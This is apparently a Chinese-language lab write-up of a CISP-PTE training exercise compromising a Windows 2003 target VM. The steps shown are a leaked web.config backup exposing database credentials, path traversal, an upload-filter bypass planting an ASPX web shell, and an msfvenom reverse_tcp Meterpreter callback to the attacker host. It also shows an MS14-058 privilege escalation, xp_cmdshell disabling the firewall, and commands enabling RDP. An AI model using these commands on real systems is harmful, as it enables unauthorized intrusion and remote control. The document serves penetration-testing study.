CISP-PTE靶机

简介: 本文档详细记录了一次针对Windows 2003服务器的渗透测试过程。测试环境包括攻击机(Kali Linux,IP: 192.168.18.130)和靶机(Windows 2003,IP: 192.168.18.145),两者需处于同一局域网内。测试过程中,通过Nmap扫描发现靶机开放了SQL Server端口,进一步利用信息泄露、文件上传漏洞及数据库连接等方式,逐步获取了系统的控制权限,最终实现了远程桌面连接。文中还提供了多种技术细节和操作命令,帮助读者理解每一步的具体实现方法。

实验环境

攻击机:Kali
IP 地址:192.168.18.130
靶机:pte-win2003(windows)
IP 地址:192.168.18.145
网络:两个主机须在同一局域网下,所以虚拟机的网络配置器必须相同

一、信息收集

正常扫描nmap -sS 192.168.18.145 -T4 发现只开放了一个sql-server 随即全端口扫描

访问网站

御剑扫描完发现有爬虫协议

二、解题步骤

访问首页

看看有没有信息泄露

在网络安全和渗透测试中,Git文件泄露是一个重要的考察点,因为它可能导致敏感信息(如源代码、配置文件、密码等)的暴露。

手动检查的方法为url/.git ,这里无法访问但是提示了目标为iis

iis默认配置文件为web.config看看有没有备份文件

http://192.168.18.145:27689/web.config.bak

成功下载并访问,这里把数据库信息显示了出来

链接数据库

查询到密码

登录得到key1

发现目标存在着注入,但是我们已经连接上数据库意义不大,尝试写入一句话木马,或者oshell,尝试失败

这里选择常规的文件上传,测试奇怪后缀也被拦判断为白名单

这里想尝试文件包含图片马,然后默认aspx文件本身就是一个一句话木马,但是被误导了一直找到下载文件的接口去

192.168.18.145:27689/admin/file_down.aspx?file=638596652953750000-111111111.jpg

附:这里通过网上wp发现fuzz之后最终回溯两层目录到web根目录并下载web.config

192.168.18.145:27689/admin/file_down.aspx?file=../../web.cofig

转变思路观察到文件说明上传剪切后缀

经过测试 配合上时间戳后 文件名设置八位刚好jpg被隐藏

上传一句话木马

最后峰回路转在这里发现文件上传路径,真正的文件在这里,不应该去下载文件的,刚上传文件什么的找错了思路,在这里把那个aspx文件下载下来,并且能看到里面的密码,找到该文件的真实位置:

蚁剑连接上去自己上传的马子

成功得到key2

或者直接使用这个木马里面就是一句话木马

手工法

这里登录进来发现数据库的账号密码

查询到key.txt,得到key3

或者后渗透

msf上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.130 LPORT=8848 -f exe -o 1.exe

msf6 exploit(multi/hams/steamed) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf6 exploit(multi/handler) > set PORT 8848
LPORT => 8848
msf6 exploit(multi/handler) > exploit

通过剑蚁上传到靶机后,通过虚拟终端shell来运行程序

成功上线后,使用bg维持会话的同时继续执行其他模块,

bg
search ms14_058
use 0
set seesion 1
set LPORT
set LHOST
run

提权成功

解密

meterpreter > run post/windows/manage/enable_rdp

发现开启不了跟着网上的教程走一下msf版本sa提权

msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set password cisp-pte@sa
password => cisp-pte@sa
msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.18.145
RHOSTS => 192.168.18.145
msf6 auxiliary(admin/mssql/mssql_exec) > set RPORT 1433
RPORT => 1433
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe /c "netsh firewall set opmode disable"
CMD => cmd.exe /c netsh firewall set opmode disable
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.18.145
[*] 192.168.18.145:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c netsh firewall set opmode disable'

远连成功

附一个wmic法

开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

相关文章
|
安全 网络安全 PHP
CISP-PTE综合靶机-WinServer2008学习
CISP-PTE综合靶机-WinServer2008学习
790 0
|
4月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
|
4月前
|
安全 Windows
抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
|
4月前
|
安全
偶遇鬼影病毒nat.exe
偶遇鬼影病毒nat.exe
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
313 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
|
SQL Shell 网络安全
CISP-PTE综合靶机-WinServer2003学习
CISP-PTE综合靶机-WinServer2003学习
1709 0
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
267 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
297 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
255 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
|
安全 关系型数据库 MySQL
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
234 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)

热门文章

最新文章